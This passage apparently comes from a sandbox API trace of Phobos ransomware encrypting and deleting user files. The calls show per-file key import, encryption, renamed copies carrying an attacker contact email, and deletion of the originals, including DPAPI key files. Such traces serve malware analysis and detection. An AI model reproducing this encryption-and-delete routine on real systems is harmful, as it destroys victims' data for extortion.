pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0210.389] CryptDestroyKey (hKey=0xa328e8) returned 1 [0210.389] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0210.389] CryptDestroyKey (hKey=0xa32928) returned 1 [0210.389] CloseHandle (hObject=0xfc) returned 1 [0210.389] CloseHandle (hObject=0xac) returned 1 [0210.389] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk")) returned 1 [0210.390] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0210.390] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0210.391] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1228) returned 1 [0210.391] CloseHandle (hObject=0xac) returned 1 [0210.391] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk")) returned 0x20 [0210.391] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0210.391] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0210.391] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0210.391] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0210.392] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0210.392] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0210.392] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0210.392] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4cc, lpOverlapped=0x0) returned 1 [0210.594] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4d0, dwBufLen=0x4d0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4d0) returned 1 [0210.594] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4d0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x4d0, lpOverlapped=0x0) returned 1 [0210.595] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328e8) returned 1 [0210.595] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0210.595] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0210.595] CryptDestroyKey (hKey=0xa328e8) returned 1 [0210.595] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0210.595] CryptDestroyKey (hKey=0xa32928) returned 1 [0210.595] CloseHandle (hObject=0xac) returned 1 [0210.595] CloseHandle (hObject=0xfc) returned 1 [0210.595] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk")) returned 1 [0210.596] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0210.596] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0210.597] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=468) returned 1 [0210.597] CloseHandle (hObject=0xfc) returned 1 [0210.597] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9")) returned 0x2026 [0210.597] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0210.597] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0210.597] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0210.597] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0210.597] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0210.870] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa328e8) returned 1 [0210.870] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0210.870] ReadFile (in: hFile=0xfc, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1d4, lpOverlapped=0x0) returned 1 [0210.871] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1e0, dwBufLen=0x1e0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1e0) returned 1 [0210.871] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1e0, lpOverlapped=0x0) returned 1 [0210.872] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0210.872] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0210.872] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0210.872] CryptDestroyKey (hKey=0xa32a28) returned 1 [0210.872] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0210.872] CryptDestroyKey (hKey=0xa328e8) returned 1 [0210.872] CloseHandle (hObject=0xfc) returned 1 [0210.872] CloseHandle (hObject=0x178) returned 1 [0210.872] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9")) returned 1 [0210.873] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0210.873] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Music.library-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\music.library-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0210.874] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=3545) returned 1 [0210.874] CloseHandle (hObject=0x178) returned 1 [0210.874] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Music.library-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\music.library-ms")) returned 0x2020 [0210.874] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Music.library-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\music.library-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0210.874] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Music.library-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\music.library-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0210.874] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0210.886] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0210.886] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Music.library-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\music.library-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0210.887] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa328e8) returned 1 [0210.887] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0210.887] ReadFile (in: hFile=0x178, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xdd9, lpOverlapped=0x0) returned 1 [0210.914] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xde0, dwBufLen=0xde0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xde0) returned 1 [0210.914] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xde0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xde0, lpOverlapped=0x0) returned 1 [0210.915] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0210.915] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0210.915] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0210.915] CryptDestroyKey (hKey=0xa32a28) returned 1 [0210.915] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0210.915] CryptDestroyKey (hKey=0xa328e8) returned 1 [0210.915] CloseHandle (hObject=0x178) returned 1 [0210.915] CloseHandle (hObject=0xfc) returned 1 [0210.915] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Music.library-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\music.library-ms")) returned 1 [0210.916] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0210.916] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\1b4dd67f29cb1962.automaticdestinations-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0210.916] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=5632) returned 1 [0210.916] CloseHandle (hObject=0xfc) returned 1 [0210.916] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\1b4dd67f29cb1962.automaticdestinations-ms")) returned 0x20 [0210.917] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\1b4dd67f29cb1962.automaticdestinations-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0210.917] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\1b4dd67f29cb1962.automaticdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0210.917] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0210.917] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0210.917] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\1b4dd67f29cb1962.automaticdestinations-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.064] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0211.064] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.064] ReadFile (in: hFile=0xfc, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1600, lpOverlapped=0x0) returned 1 [0211.114] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1610, dwBufLen=0x1610 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1610) returned 1 [0211.114] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1610, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1610, lpOverlapped=0x0) returned 1 [0211.115] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328e8) returned 1 [0211.115] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.115] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x80, dwBufLen=0x80 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x80) returned 1 [0211.115] CryptDestroyKey (hKey=0xa328e8) returned 1 [0211.115] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x132, lpOverlapped=0x0) returned 1 [0211.115] CryptDestroyKey (hKey=0xa32928) returned 1 [0211.115] CloseHandle (hObject=0xfc) returned 1 [0211.115] CloseHandle (hObject=0xac) returned 1 [0211.115] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\1b4dd67f29cb1962.automaticdestinations-ms")) returned 1 [0211.127] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0211.127] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\mail recipient.mapimail"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.127] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=4) returned 1 [0211.127] CloseHandle (hObject=0xac) returned 1 [0211.127] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\mail recipient.mapimail")) returned 0x2020 [0211.128] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\mail recipient.mapimail.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.128] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\mail recipient.mapimail"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.128] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.128] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.128] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\mail recipient.mapimail.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.128] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0211.128] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.128] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4, lpOverlapped=0x0) returned 1 [0211.129] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x10, dwBufLen=0x10 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x10) returned 1 [0211.129] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x10, lpOverlapped=0x0) returned 1 [0211.130] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328e8) returned 1 [0211.130] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.130] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0211.130] CryptDestroyKey (hKey=0xa328e8) returned 1 [0211.130] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, 